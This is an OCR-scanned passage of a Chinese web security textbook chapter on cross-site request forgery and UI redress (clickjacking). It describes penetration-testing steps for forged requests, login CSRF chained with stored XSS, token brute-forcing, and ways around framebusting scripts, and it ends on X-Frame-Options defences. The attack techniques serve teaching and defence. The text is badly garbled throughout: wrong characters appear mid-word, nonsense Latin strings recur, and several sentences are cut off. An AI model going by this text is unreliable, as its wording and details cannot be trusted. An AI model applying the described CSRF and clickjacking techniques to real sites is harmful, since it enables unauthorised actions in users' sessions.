2004 年 ，Dave Armstrong 在 eBay 应 用 程序 中 发 现 了 一 个 典型 CSRF 漏 
洞 。 攻 击 者 可 以 设计 一 个 URL， 使 得 请 求 这 个 URL 的 用 户 对 某 个 拍卖 品 
给 出 任意 标价 。 某 个 第 三 方 网 站 可 以 诱 使 访问 者 请 求 这 个 URL， 以 致 于 
任何 访问 这 个 网 站 的 eBay 用 户 都 会 报 出 一 个 标价 。 而 且 ， 进 行 调整 后 ， 
我 们 还 可 以 在 同一 eBay 应 用 程序 的 一 个 保存 型 OSRF 攻 击 中 利用 这 个 漏 
洞 。 应 用 程序 允许 用 户 在 拍卖 品 摘 述 中 插入 <img> 标 签 。 为 防止 攻击 ， 
应 用 程序 确认 标签 目标 返回 了 真正 的 图 像 文件 。 但 是 ， 攻 击 者 也 可 以 在 
上 述 位置 插 入 一 个 指 回 站 外 服务 器 的 链接 ( 它 在 创建 招 卖 品 时 返回 一 幅 
合法 的 图 像 〉》， 并 随后 用 一 个 返回 他 专门 设计 的 CSRF URL 的 HITP 重 定 
癌 代 蔡 这 个 链接 。 因 此 ， 任 何 查 看 拍卖 品 的 用 户 都 会 在 不 知情 的 情况 下 
给 出 一 个 标价 。 欲 知 攻击 详情 ， 请 碍 疯 最 初 在 Bugtraq 上 发 表 的 文章 : 

http://archive.cert.uni-stuttgart.de/bugtraq/2005/04/msg00279.html 

















— 
f 
=> 注解 应 用 程序 确认 站 外 图 像 方 面 的 漏洞 称 为 “检查 时 间 ， 
使 用 时 间 ”(TOCTOU ) 漏洞 。 因 为 某 个 数据 在 一 个 时 间 确 认 ， 却 
间 使 用 ， 导 致 攻击 者 能 够 在 这 两 个 时 间 的 间隔 内 修改 该 
数据 的 值 。 


© 利用 CSRF 漏 洞 

CSRF 漏 洞 主要 出 现在 应 用 程序 仅 依赖 HTTP cookie 追 踪 会 话 令 牌 的 
情况 下 。 一 旦 应 用 程序 已 经 在 用 户 的 浏览 器 中 设 定 了 cookie， 浏 览 器 会 
自动 在 随后 的 每 个 请 求 中 将 这 个 cookie 提 交 给 应 用 程序 。 无 论 请 求 是 源 
上 自 某 个 链接 、 应 用 程序 本 身 中 的 表单 或 任何 其 他 地 方 “如 外 部 网 站 或 在 
电子 邮件 中 单 击 的 链接 ) ， 它 都 会 这 样 做 。 如 果 应 用 程序 未 采取 防范 措 
以 这 种 方式 “ 闭 置 ” 它 的 用 户 的 会 话 ， 它 就 易于 受到 
CSRF 攻 击 。 








渗透 测试 步 又 


(1) 根据 在 应 用 程序 解析 过 程 中 得 到 的 结果 (请 参阅 第 4 章 了 
解 相关 内 容 ) ， 检 查 应 用 程序 的 关键 功能 。 

(2) 找到 一 项 可 用 于 代表 不 知情 的 用 户 执行 某 种 敏感 操作 的 
应 用 程序 功能 ， 该 功能 仅 依 赖 cookie 来 追踪 用 户 会 话 ， 并 且 使 用 攻 
击 者 能 够 提前 决定 的 请 求 参数 ， 也 就 是 说 ， 其 中 并 不 包含 任何 会 话 
令 牌 或 其 他 无 法 预测 的 数据 。 

(3) 创建 一 个 HTML 页面， 它 不 需要 进行 任何 用 户 交 互 即 可 
提出 所 需 请 求 。 对 于 GET 请 求 ， 可 以 使 用 <img> 标 签 ， 并 通过 src 参 
数 设置 易 受 攻击 的 URL。 对 于 POST 请 求 ， 可 以 建立 一 个 表单 ， 其 
中 包含 实施 攻击 所 需 全 部 相关 参数 的 隐藏 字段 ， 并 将 其 目标 设置 为 
es 


(4) 登录 应 用 程序 后 ， 使 用 同一 个 浏览 器 加 载 专门 设计 的 
HTML 页 面 。 确 认 应 用 程序 是 否 执行 所 需 操 作 。 
































YY 提示 由 于 引入 了 其 他 攻击 向 量 ，CSRF 攻 击 的 可 能 性 改变 
了 许多 其 他 类 型 的 漏洞 的 影响 范围 。 例 如 ， 如 果菜 项 管理 功能 接受 
参数 中 的 用 户 标识 符 ， 然 后 显示 与 指定 用 户 有 关 的 信息 。 该 功能 受 
到 严格 的 访问 控制 ， 但 它 的 uid 参 数 中 包含 SQL 注入 漏洞 。 由 于 应 用 
程序 管理 员 为 可 信用 户 ， 并 且 在 任何 情况 下 都 能 够 完全 控制 数据 

库 ， 因 此 ， 这 种 SQL 注入 漏洞 被 认为 风险 较 低 。 但 是 ， 由 于 该 功能 
并 不 执行 任何 管理 操作 〈 根 据 最 初 的 设计 ) ， 因 此 其 并 未 采取 防范 
CSRF 的 措施 。 从 攻击 者 的 角度 看 ， 该 功能 与 专门 供 管理 员 执 行 任 
意 SQL 查 询 的 功能 一 样 重要 。 如 果 可 以 注入 一 个 执行 某 种 敏感 操 

作 ， 或 通过 带 外 通道 检索 数据 的 查询 ， 那 么 即使 是 非 管 理 用 户 也 可 
以 通过 CSRF 实 施 这 种 攻击 。 











@ 验证 与 CSRF 





由 于 实施 CSRF 攻 击 需 要 在 受害 用 户 的 会 话 中 执行 某 种 特权 操作 ， 
因此 ， 在 实施 攻击 时 ， 用 户 需 要 登录 到 应 用 程序 。 

一 个 存在 大 量 和 危险 的 CSRF 漏 洞 的 位 置 ， 是 家 庭 DSL 路 由 塔 使 用 的 
Web 界 面 。 这 些 设备 大 多 包含 敏感 功能 ， 如 打开 面 问 互联 网 的 防火 载 上 
的 所 有 端口 。 由 于 这 些 功 能 通常 并 未 采取 防范 CSRF 的 措施 ， 并 且 多 数 
用 户 也 没有 修改 设备 的 默认 内 部 了 王 地址， 因此， 它们 易于 受到 由 恶意 外 
部 站 点 传送 的 CSRF 攻 击 。 但 是 ， 相 关 设 备 通常 需要 进行 验证 才能 执行 
敏感 操作 ， 而 且 许 多 用 户 并 未 登录 他 们 的 设备 。 

如 果 设 备 的 Web 界 面 使 用 基于 表单 的 验证 ， 则 可 以 通过 首先 使 用 户 
登录 设备 ， 然 后 执行 经 过 验证 的 操作 ， 从 而 实施 两 步 攻 击 。 由 于 大 多 数 
用 户 并 未 修改 这 类 设备 的 默认 证 书 ( 可 能 认为 该 Web 界 面 只 能 通过 内 部 
家 许 网 络 访问 ) ， 因 此 ， 攻 击 者 的 网 页 可 以 首先 提出 包含 默认 证 书 的 登 
KEK. Wa, RESPIR ETS, BEATE 
何 请 求 ， 包 括 由 攻击 者 生成 的 请 求 ， 将 上 自动 传送 该 令 牌 。 

在 其 他 情况 下 ， 攻 击 者 可 能 需要 受害 用 户 以 攻击 者 自身 的 用 户 账户 
登录 应 用 程序 才能 实施 特定 的 攻击 。 以 一 个 允许 用 户 上 传 并 存储 文件 的 
应 用 程序 为 例 。 这 些 文件 随后 可 以 进行 下 载 ， 但 只 能 由 上 传 它们 的 用 户 
下 载 。 假 设 由 于 没有 对 文件 内 容 进行 过 滤 ， 访 功能 可 用 于 实施 保存 型 
XSS 攻 击 〈( 请 参阅 第 12 章 了 解 相 关内 容 ) 。 议 漏洞 似乎 并 不 会 造成 任何 
伤害 ， 因 为 攻击 者 只 能 用 它 来 攻击 自己 。 但 实际 上 ， 通 过 使 用 CSRF 技 
巧 ， 攻 击 者 可 以 利用 保存 型 XSS 漏 洞 来 攻破 其 他 用 户 。 如 上 文 所 述 ， 攻 
击 者 的 网 页 可 以 提出 一 个 CSRF 请 求 ， 强 制 受害 用 户 使 用 攻击 者 的 证 书 
登录 。 然 后 ， 攻 击 者 的 网 页 可 以 提出 另 一 个 CSRF 请 求 ， 以 下 载 某 个 恶 
意 文 件 。 用 户 的 浏览 器 处 理 该 文件 时 ， 攻 击 者 的 XSS 有 效 载 集 将 会 执 
行 ， 用 户 在 易 受 攻击 的 应 用 程序 中 的 会 话 将 被 攻破 。 虽 然 受 害 者 当前 是 
使 用 攻击 者 的 账户 登录 的 ， 但 是 ， 攻 击 并 未 就 此 结束 。 如 第 12 章 所 述 ， 
XSS 有 效 载荷 可 以 在 用 户 的 浏览 器 中 持续 存在 ， 并 执行 任意 操作 ， 因 而 
可 以 让 用 户 注销 其 在 易 受 攻击 的 应 用 程序 中 的 会 话 ， 并 诱 使 其 使 用 自己 
的 证 书 登 录 。 

@ 历 止 CSRFE 漏 洞 

由 于 浏览 堪 目 动 在 随后 的 每 个 请 求 中 将 cookie 返 回 给 发 布 cookie 的 
Web 服 务 器 ，CSRF 漏 洞 因此 产生 。 如 果 某 个 web 应 用 程序 主要 依赖 
HTTP cookie 传 送 会 话 令 牌 ， 那 么 它 本 身 就 易于 受到 这 种 攻击 。 

防范 CSRF 攻 击 的 标准 方法 ， 是 将 HTTP cookie 与 其 他 追踪 令 牌 的 方 
法 相 结 合 。 这 类 方法 通常 采用 其 他 通过 HTTP 隐 藏 表单 字段 传输 的 令 
牌 。 在 每 次 提交 请 求 时 ， 应 用 程序 除 确 认 会 话 cookie 外 ， 还 核实 表单 是 
售 传 送 了 正确 的 令 牌 。 如 果 攻 击 者 无 法 确定 该 令 牌 的 值 ， 惑 无 法 构建 跨 






































域 请 求 ， 也 就 无 法 执行 所 需 的 操作 。 


NG 
> 注解” 本章 后 面部 分 将 介绍 ， 即 使 使 用 CSRF 令 牌 受到 可 靠 
保护 的 功能 也 可 能 易于 受到 用 户 界 面 CUD 伪装 攻击 。 


以 这 种 方式 使 用 反 CSRE 令 牌 时 ， 必 须 为 这 些 令 牌 提供 与 正常 的 会 
话 令 牌 相同 的 保护 。 如 果 攻 击 者 能 够 预测 发 布 给 其 他 用 户 的 令 牌 值 ， 他 
就 能 够 确定 提出 CSRF 请 求 所 需 的 所 有 参数 ， 因 而 仍然 能 够 实施 攻击 。 
此 外 ， 如 果 反 CSRF 令 牌 末 与 所 属 用 户 的 会 话 相 关联 ， 攻 击 者 就 可 以 在 
自己 的 会 话 中 获得 一 个 有 效 令 有 牌 ， 并 将 此 令 牌 用 在 针对 其 他 用 户 的 会 话 
的 CSRF 攻 击 中 。 
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Ce 警告 ”一些 应 用 程序 使 用 相对 较 短 的 反 CSREF 令 牌 ， 可 
能 因为 认为 这 些 令 牌 不 会 像 较 短 的 会 话 令 牌 一 样 受 到 灾 力 攻击 。 任 
何 回 应 用 程序 传送 大 量 可 能 值 的 攻击 都 需要 通过 受害 者 的 浏览 器 传 
送 这 些 值 ， 包 括 提交 大 量 可 能 被 轻易 察觉 的 请 求 。 此 外 ， 如 果 收 到 
太 多 无 效 的 反 CSREF 令 牌 ， 应 用 程序 可 能 会 防御 性 地 终止 用 户 的 会 
话 ， 从 而 阻止 相关 攻击 。 但 是 ， 这 种 防御 忽略 了 纯粹 在 客户 端 实施 
的 蛋 力 攻击 ， 而 不 同 服 务 器 发 送 任何 请 求 的 可 能 性 。 在 某 些 情况 
下 ， 可 以 通过 使 用 基于 CSS 的 技巧 来 枚 举 用 户 的 浏览 历史 记录 ， 从 
eee 要 想 成 功 实施 这 类 攻击 ， 必 须 满足 以 下 两 个 条 

口 应 用 程序 必须 某 些 时 候 在 URL 查 询 字符 串 中 传输 CSREF 令 
牌 。 这 种 情况 经 单 发 和 后， 因为 许多 受 保护 的 功能 通过 目标 URL 中 包 
含 令 牌 的 简单 超 链接 即 可 访问 。 

口 应 用 程序 必须 在 整个 用 户 会 话 中 使 用 相同 的 反 CSRF 令 牌 ， 
或 者 允许 多 次 使 用 同一 个 令 牌 。 这 种 情况 也 经 常 发 生 ， 一 方面 是 为 
了 改善 用 户 的 使 用 体验 ， 男 一 方面 是 为 了 便于 使 用 浏览 器 的 “后 
退 "? 和 “前 进 ” 按 钮 。 

如 果 满 足 这 些 条 件 ， 并 且 目 标 用 户 已 访问 某 个 包含 反 CSRF 令 
牌 的 URL， 攻 击 者 就 可 以 从 自己 的 页 面 实施 蛋 力 攻 击 。 这 时 ， 攻 击 
者 页 面 上 的 一 段 脚本 将 动态 创建 指 癌 目标 应 用 程序 上 的 相关 URL 的 
超 链接 ， 同 时 在 每 个 链接 中 包括 一 个 不 同 的 反 CSRE 令 牌 值 。 然 
后 ， 该 脚本 使 用 JavaScript API getComputedStyle 测 试用 户 是 否 访问 
了 上 述 链接 。 确 定 某 个 被 访问 的 链接 后 ， 即 可 发 现 一 个 有 效 的 反 
reais Rye, Bore Wy OUP Pe PT EUR 
































需要 注意 的 是 ， 要 防范 CSRF 攻 击 ， 仅 仅 使 用 多 阶段 过 程 执行 敏感 
操作 并 不 够 。 例 如 ， 管 理 员 在 添加 新 用 户 账户 时 ， 他 可 能 会 在 第 一 阶段 
输入 相关 信息 ， 然 后 在 第 二 阶段 检查 并 确认 这 些 信息 。 如 果 未 使 用 其 他 
反 CSREF 令 牌 ， 该 功能 将 仍然 易于 受到 CSRF 攻 击 ， 因 为 攻击 者 只 需要 轮 
流 提 交 两 个 所 需 的 请 求 ， 或 者 直接 提交 第 二 个 请 求 〈 极 为 常见 ) 。 

少数 情况 下 ， 应 用 程序 功能 会 采用 另 一 个 令 牌 ; 它 在 一 个 响应 中 设 
置 该 令 牌 ， 然 后 在 接 下 来 的 请 求 中 提交 该 令 牌 。 但 是 ， 在 这 两 个 阶段 之 
间 转 换 需 要 进行 重 定向 ， 因 此 应 用 程序 采用 的 防御 机 制 可 能 会 失效 。 虽 
然 CSREF 属 于 单 向 攻击 ， 并 且 无 法 从 应 用 程序 的 响应 中 读 取 令 牌 ， 但 如 
果 CSRE 响 应 包含 重 定 向 ， 而 且 该 重 定向 指向 其 他 包含 令 牌 的 URL， 受 
害 者 的 浏览 器 将 自动 访问 该 重 定 向 ， 并 自动 在 提出 的 请 求 中 提交 令 牌 。 
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不 要 犯 下 错误 ， 依 靠 HTTP Referer 消 息 头 来 指示 请 求 是 源 自 站 内 还 
是 站 外 。Referer 消 息 头 可 以 使 用 旧版 Flash 进 行 修 改 ， 或 用 元 刷新 标签 
(meta refresh tag) 来 伪装 。 通 常 而 言 ， 使 用 Referer 消 息 头 并 不 能 关 
Web 应 用 程序 提供 强大 的 安全 防御 。 

@ 通过 XSS 突 破 反 CSRF 防 御 

人 们 常 称 ， 如 果 应 用 程序 中 包含 任何 XSS 漏 洞 ， 那 么 反 CSRF 防 御 
机 制 就 可 以 被 突破 。 这 种 说 法 并 不 完全 正确 。 但 是 ， 文 持 这 种 观点 的 思 
考 方法 是 正确 的 ; 因为 XSS 有 效 载 答 在 本 站 执行 ， 可 以 与 应 用 程序 进行 
双 回 交互 ， 所 以 它们 能 够 从 应 用 程序 的 啊 应 中 获取 令 牌 ， 并 在 随后 的 请 
De HA PEAS IK HES PH 

然而 ， 如 果 某 个 本 身受 到 反 CSRF 防 御 机 制 保护 的 页 面 也 包含 反射 
型 XSS 漏 洞 ， 那 么 这 种 漏洞 并 不 能 直接 用 于 突破 防御 。 记 住 ， 在 反射 型 
XSS 攻 击 中 ， 最 初 的 请 求 为 路 站 点 请 求 。 这 时 ， 攻 击 者 会 设计 一 个 URL 
或 一 个 POST 请 求 ， 其 中 包含 随后 被 复制 到 应 用 程序 的 啊 应 中 的 恶意 输 
入 。 但 是 ， 如 果 易 受 攻击 的 页 面 实 施 了 反 CSRF 防 御 ， 那 么 攻击 者 要 想 
实施 有 效 攻击 ， 其 专门 设计 的 请 求 中 必须 已 经 包含 必要 的 令 牌 。 如 果 其 
中 没有 所 需 令 牌 ， 应 用 程序 将 会 拒绝 攻击 者 提出 的 请 求 ， 同 时 包含 反射 
型 XSS 漏 洞 的 代码 路 径 也 不 会 执行 。 这 时 ， 问 题 并 不 在 于 注入 的 脚本 是 
人 奋 能 够 读 取 应 用 程序 啊 应 中 的 任何 令 牌 (当然 它 能 ) ， 而 在 于 如 何 首 先 
将 脚本 注入 到 某 个 包含 那些 令 牌 的 啊 应 中 。 

通常 ， 在 下 面 几 种 情况 下 ， 我 们 可 以 利用 XSS 漏 洞 突破 反 CSREF 防 


口 如 果 受 保护 的 功能 中 存在 任何 XSS 漏 洞 ， 那 么 攻击 者 总 可 以 利用 
这 些 漏洞 突破 反 CSRE 防 御 。 通 过 保存 型 攻击 注入 的 JavaScript 可 直接 读 
取 脚 本 所 在 的 应 用 程序 啊 应 中 的 令 牌 。 

口 如 果 应 用 程序 仅 对 一 部 分 通过 验证 的 功能 实施 反 CSRE 防 御 ， 并 
且 某 项 未 防御 CSRE 的 功能 中 存在 一 个 反射 型 XSS 漏 洞 ， 那 么 攻击 者 就 
可 以 利用 这 个 漏洞 来 突破 反 CSRF 防 御 。 例 如 ， 如 果 应 用 程序 仅 采 用 反 
CSREF 令 牌 保护 转账 功能 的 第 二 个 步 又， 那么 攻击 者 就 可 以 利用 反射 型 
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XSS 攻 击 从 其 他 步骤 中 突破 防御 。 通 过 这 个 漏洞 注入 的 一 段 脚本 可 以 向 
第 一 个 转账 步骤 提出 一 个 站 内 请 求 ， 和 截取 令 牌 ， 然 后 使 用 这 个 令 牌 进入 
第 二 个 步骤 。 攻 击 之 所 以 能 够 成 功 ， 是 因为 第 一 个 没有 采取 CSRE 防 御 
的 转账 步骤 返回 了 访问 受 保 护 页 面 所 需 的 令 牌 。 仅 依赖 HTTP cookie 实 
现 第 一 个 步 又， 意味 着 攻击 者 可 以 利用 它 访问 保护 第 二 个 步骤 的 令 牌 ， 
从 而 实施 有 效 攻 击 。 

口 在 某 些 应 用 程序 中 ， 反 CSREF 令 牌 仅 与 当前 用 户 相关 联 ， 而 不 是 
与 用 户 的 会 话 相 关联 。 在 这 种 情况 下 ， 如 果 登 录 表 单 未 防范 CSRF 攻 
击 ， 则 应 用 程序 仍 有 可 能 受到 多 阶段 攻击 。 首 先 ， 攻 击 者 使 用 自己 的 账 
户 登 录 ， 获 得 一 个 与 他 的 用 户 映 份 关 联 的 有 效 反 CSRE 令 有 牌 。 然 后 ， 攻 
击 者 对 登录 表单 发 动 CSRF 攻 击 ， 人 迫使 受害 用 户 使 用 他 的 证 书 登 录 ， 如 
上 文 介绍 利用 相同 用 户 的 保存 型 XSS 漏 洞 时 所 述 。 一 旦 用 户 作 为 攻击 者 
登录 ， 攻 击 者 将 使 用 CSRF 使 用 户 提出 相关 请 求 ， 对 XSS 漏 洞 加 以 利 
用 ， 同 时 使 用 他 此 前 获得 的 反 CSRF 令 牌 。 然 后 ， 攻 击 者 的 XSS 有 效 载 
和 荷 将 在 用 户 的 浏览 器 中 执行 。 由 于 用 户 仍然 作为 攻击 者 登录 ，XSS 有 效 
载荷 可 能 需要 使 用 户 注销 ， 然 后 诱 使 用 户 再 次 登录 ， 最 终 ， 用 户 的 登录 
证 书 和 生成 的 应 用 程序 会 话 都 被 完全 攻破 。 

口 如 果 反 CSREF 令 牌 未 与 用 户 关 联 ， 而 是 与 当前 会 话 关 联 ， 且 攻击 
者 可 以 通过 某 种 方法 在 用 户 的 浏览 器 中 注入 cookie， 则 只 需 对 以 上 攻击 
稍 作 修 改 即 可 (本 章 后 面部 分 将 介绍 这 种 攻击 ) 。 这 时 ， 攻 击 者 不 是 使 
用 自己 的 证 书 针对 登录 表单 实施 CSRF 攻 击 ， 而 可 以 直接 向 用 户 传 送 他 
当前 的 会 话 令 牌 及 与 该 会 话 关 联 的 反 CSREF 令 牌 。 然 后 ， 该 攻击 的 剩余 
部 分 与 之 前 所 述 的 步骤 相同 。 

除 这 些 情形 外 ， 在 许多 时 候 ， 针 对 CSRF 攻 击 的 有 效 防御 能 够 在 很 
大 程度 上 阻止 〈 即 使 不 能 完全 阻止 ) 攻击 者 利用 某 些 反射 型 XSS 漏 洞 。 
但 是 ， 在 任何 情况 下 ， 无 论 我 们 采取 了 何 种 反 CSRF 防 御 来 阻止 攻击 者 
试图 利用 XSS 条 件 ， 我 们 都 应 始终 修复 应 用 程序 中 存在 的 任何 这 类 XSS 


RE 





























13.1.2 UI 伪装 


基本 上 ， 与 页 面 中 的 令 牌 有 关 的 反 CSRE 防 御 则 在 确保 请 求 是 由 应 
用 程序 中 的 用 户 操 作 本 和 喘 提 出 的 ， 而 不 是 由 某 个 第 三 方 域 诱发 的 。 即 使 
采用 了 反 CSRF 令 牌 ， 第 三 方 站 点 仍然 可 以 通过 UI 伪 关 攻击 诱 使 其 他 域 
中 的 用 户 执行 操作 。 在 某 种 程度 上 ， 这 类 攻击 之 所 以 能 够 成 功 ， 是 因为 
生成 的 请 求实 际 上 来 自 攻击 者 针对 的 应 用 程序 。UI 伪 闭 技 巧 通常 也 称 
为 "点击 劫持 ”(clickjacking) 、“ 键 击 劫持 ”(strokejacking) 等 其 他 常见 








说 法 。 
基本 上 ， 在 UI 伪装 攻击 中 ， 攻 击 者 的 网 页 会 将 目标 应 用 程序 加 载 到 
其 页 面 上 的 这 ame 中 。 而 实际 上 ， 攻 击 者 会 用 其 他 界面 覆盖 目标 应 用 程 
序 的 界面 。 攻 击 者 的 界面 中 包含 吸引 用 户 并 诱 使 其 执行 各 种 操作 (如 在 
页 面 的 特定 区 域 单 击 鼠 标 ) 的 内 容 。 用 户 执行 这 些 操作 时 ， 虽 然 看 起 来 
其 单 击 的 是 攻击 者 的 界面 中 显示 的 按钮 和 其 他 UI 元 素 ， 但 他 实际 上 是 在 
不 知情 的 情况 下 与 攻击 者 所 针对 的 应 用 程序 进行 交互 。 

以 一 个 分 两 步 进 行 转账 的 银行 功能 为 例 。 在 第 一 步 中 ， 用 户 提 交 转 
账 信 息 。 对 此 请 求 的 啊 应 将 显示 这 些 信 息 ， 以 及 一 个 用 于 确认 该 操作 并 
进行 转账 的 按钮 。 此 外 ， 为 防止 CSRF 攻 击 ， 响 应 中 的 表单 还 包含 一 个 
隐藏 字段 ， 其 中 提供 了 一 个 无 法 预测 的 令 牌 。 此 令 牌 在 用 户 单 击 “ 确 
认 ” 时 提交 ， 应 用 程序 将 在 转账 之 前 验证 它 的 值 。 

在 UI 伪装 攻击 中 ， 攻 击 者 的 页 面 在 此 过 程 中 使 用 传统 的 CSRF 提 交 
第 一 个 请 求 。 提 交 过 程 在 攻击 者 页 面 内 的 iframe 中 完成 。 和 正常 情况 下 
一 样 ， 应 用 程序 会 作出 啊 应 ， 返 回 要 添加 的 用 户 的 详细 信息 ， 以 及 一 个 
用 于 确认 该 操作 的 按钮 。 此 啊 应 将 在 攻击 者 的 iframe 中 “显示 ”， 该 iframe 
己 由 攻击 者 的 界面 窗 产 ， 该 界面 由 在 族 使 受害 用 户 单 击 包 含 “ 人 确认 ”按钮 
的 区 域 。 如 果 用 户 在 此 区 域 单 击 ， 他 将 在 不 知情 的 情况 下 单 击 目 标 应 用 
程序 中 的 “确认 ”按钮 ， 从 而 创建 新 用 户 。 这 种 基本 的 攻击 如 图 13-1 所 
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图 13-1 基本 的 UI 伪装 攻击 


这 种 攻击 之 所 以 能 够 在 纯粹 的 CSRF 攻 击 无 法 奏效 的 情况 下 取得 成 


功 ， 是 因为 应 用 程序 使 用 的 反 CSREF 令 牌 以 正常 方式 得 到 处 理 。 虽 然 由 
于 同 源 末 略 的 原因 ， 攻 击 者 的 页 面 无 法 读 取 该 令 脾 的 值 ， 但 攻击 者 的 
iframe 中 的 表单 包含 了 由 应 用 程序 生成 的 令 牌 ， 在 受害 用 户 不 知情 的 情 
况 下 单 击 “确认 ?按钮 时 ， 这 个 令 牌 被 返 交 给 应 用 程序 。 在 目标 应 用 程序 
看 来 ， 一 切 都 很 正常 。 

要 实施 欺 又， 即 让 受害 用 户 虽 然 看 到 一 个 界面 ， 但 实际 上 却 与 必 一 
个 界面 交互 ， 攻 击 者 可 以 采用 各 种 CSS 技 术 。 加 载 目标 应 用 程序 的 
iframe 可 以 为 任意 大 小 ， 位 于 攻击 者 页 面 中 的 任何 位 置 ， 并 显示 目标 页 
面 的 任意 位 置 。 使 用 适当 的 样式 属性 ， 可 以 令 该 iframe 变 得 完全 透明 ， 
从 而 使 其 对 用 户 不 可 见 。 


Al, yn vw) 
笑 试 访问 
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如 果 进 一 步 扩 展 上 述 基 本 攻击 ， 攻 击 者 可 以 在 其 界面 中 使 用 复杂 的 
脚本 代码 ， 以 诱 使 受害 用 户 执行 更 加 复杂 的 操作 ， 而 不 仅仅 是 单 击 按 
钮 。 比 方 说 ， 要 实施 攻击 ， 需 要 诱 使 用 户 在 输入 字段 〈 如 转账 页 面 
的 “金额 ?字段 ) 中 输入 一 些 文本 。 在 这 种 情况 下 ， 攻 击 者 可 以 在 其 用 户 
界面 中 包含 一 些 诱 使 用 户 输入 文本 的 内 容 ， 如 用 于 输入 电话 号 码 以 万 得 
奖励 的 表单 。 然 后 ， 攻 击 者 的 页 面 中 的 脚本 可 以 对 进行 键 击 选择 性 处 
理 ， 在 用 户 输入 相关 字符 时 ， 将 键 击 操 作 有 效 传递 到 目标 界面 ， 从 而 填 
写 所 需 的 输入 人 字段。 如果 用 户 输 入 攻击 者 不 希望 在 目标 界面 中 输入 的 字 
符 ， 该 键 击 将 不 会 传递 给 目标 界面 ， 攻 击 者 的 脚本 将 等 竺 下 一 次 键 击 。 

男 外 ， 攻 击 者 的 页 面 中 可 以 包含 诱 使 用 户 执行 拖 动 妃 标 操作 (就 像 
玩 简 单 的 游戏 一 样 ) 的 内 容 。 随 后 ， 在 攻击 者 的 页 面 中 运行 的 脚本 将 选 
择 性 地 处 理 生成 的 操作 ， 使 用 户 在 不 知情 的 情况 下 选择 目标 应 用 程序 界 
面 中 的 文本 ， 并 将 其 拖 动 到 攻击 者 的 界面 中 的 输入 字段 中 《或 相反 ) 。 
例如 ， 在 针对 Web 邮 件 应 用 程序 实施 攻击 时 ， 攻 击 者 可 以 诱 使 用 户 将 电 
子 邮件 中 的 文本 拖 动 到 其 能 够 读 取 的 输入 字段 中 。 或 者 ， 攻 击 者 可 以 诱 
使 用 户 建立 某 种 规则 ， 回 东 转 用 所 有 电子 邮件 ， 并 将 所 需 电子 邮件 地 址 
从 攻击 者 的 界面 拖 动 到 定义 该 规则 的 表单 的 相关 输入 字段 中 。 此 外 ， 由 
于 链接 和 图 像 均 可 以 作为 URL 进 行 拖 动 ， 攻 击 者 其 全 可 以 通过 诱发 拖 动 
操作 从 目标 应 用 程序 的 界面 中 拦截 敏感 URL， 包 括 反 CSRF 令 牌 。 

a E E 
文档 : 

http://ui-redressing.mniemietz.de/uiRedressing. pdf 
1. “破坏 框架 ”防御 

在 UI 伪装 攻击 最 初 受到 广泛 关注 时 ， 许 多 知名 的 Web 应 用 程序 寻求 
采用 一 种 称 为 破坏 框架 (framebusting) 的 技术 来 防范 这 类 攻击 。 在 某 
些 情况 下 ， 这 种 技术 已 用 于 防范 其 他 基于 框 染 的 攻击 。 

破坏 框架 可 以 表现 为 各 种 形式 ， 但 基本 上 ， 它 是 指 每 个 相关 的 应 用 
程序 页 面 都 会 运行 一 段 脚 本 来 检测 自己 是 否 被 加 载 到 iframe 中 。 如 果 
是 ， 应 用 程序 会 尝试 “破坏 ”该 ifframe， 或 执行 其 他 防御 性 操作 ， 如 重 定 























向 到 错误 页 面 或 拒绝 显示 应 用 程序 自己 的 界面 。 

斯 坦 福 大 学 2010 年 的 一 项 研究 表明 ， 排 名 前 500 的 网 站 均 采 用 了 “ 破 
坏 框架 ”防御 技术 。 同 时 ， 这 项 研究 还 发 现 ， 这 些 防 御 都 可 以 通过 某 种 
方式 突破 。 突 破 这 种 防御 的 方法 因 每 种 防御 的 实施 细节 而 异 ， 下 面 我 们 
通过 一 段 “ 破 坏 框架 * 示 例 代 码 来 加 以 说 明 : 


<script> 








1f (top.location != self.location) 
{ top.location = self.location } 
</script> 


这 段 代 码 检查 页 面 本 身 的 URE 与 浏览 器 窗口 中 的 顶部 框架 
的 URL 是 否 匹 配 。 如 果 不 匹 配 ， 则 说 明 页 面 已 加 载 到 子 框架 
内 。 在 这 种 情况 下 ， 脚 本 会 尝试 将 页 面 重新 加 载 到 窗口 内 的 顶 
层 框架 中 ， 从 而 “逃离 ”该 框架 。 
实施 UI 伪装 攻击 的 攻击 者 可 以 通过 各 种 方式 避 开 这 种 防御 ， 将 目标 页 面 
成 功能 入 框架 。 
口 由 于 攻击 者 的 页 面 控制 着 项 层 框架 ， 因 而 可 以 重新 定义 
top.location 的 含义 ， 在 子 框架 尝试 引用 它 时 导致 异常 。 例 如 ， 攻 击 者 可 
以 在 Internet Explorer 中 运行 以 下 代码 : 

















var location = "foo": 


这 上段 代码 将 location 重 新 定义 为 项 层 框 架 中 的 本 
地 变量 ， 在 子 框架 中 运行 的 代码 无 法 访问 该 变量 。 
口 顶层 框架 可 能 会 钩 住 window.onbeforeunload 事 件 ， 从 而 在 “破坏 框 
架 ” 代 码 尝 试 设置 顶层 框架 的 位 置 时 运行 攻击 者 的 事件 处 理 程序 。 这 
时 ， 攻 击 者 的 代码 可 以 对 返回 HTTP 204 (FEN A) 响应 的 URL 执 行进 
nn 
寺 不 变 。 
口 顶层 框架 可 以 在 将 目标 应 用 程序 加载 到 子 框架 中 时 定义 sandbox 
属性 。 这 会 在 子 框架 中 禁用 脚本 ， 同 时 将 其 cookie 保 持 为 启用 状态 。 
口 如 第 12 章 所 述 ， 顶 层 框架 可 以 利用 IE XSS 过 滤器 在 子 框架 中 选择 
性 的 禁用 “破坏 框架 ”脚本 。 当 攻击 者 的 页 面 指定 iframe 目 标的 URL 时 ， 
可 以 创建 一 个 新 参数 ， 在 参数 值 中 包含 一 段 适 当 的 “破坏 框架 * 脚 本 。IE 
XSS 过 滤器 将 标识 该 参数 值 及 目标 应 用 程序 返回 的 响应 中 的 脚本 代码 ， 
并 禁用 响应 中 的 脚本 ， 设 法 为 用 户 提供 保护 。 








Al, yn vw) 
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2. pri UI 
目前 ， 业 界 普 裔 认为 ， 虽 然 一 些 类 型 的 “破坏 框架 * 代 码 可 以 在 一 定 
度 上 阻止 UI 伪装 攻击 ， 但 绝 不 能 将 这 种 技术 作为 防范 UI 伪装 攻击 的 万 


要 防止 攻击 者 将 应 用 程序 页 面 柑 入 框架 ， 一 种 更 加 可 靠 的 方法 是 使 
用 X-Frame-Options 啊 应 消息 头 。 该 消息 头 由 Internet Explorer 8 引入 ， 随 
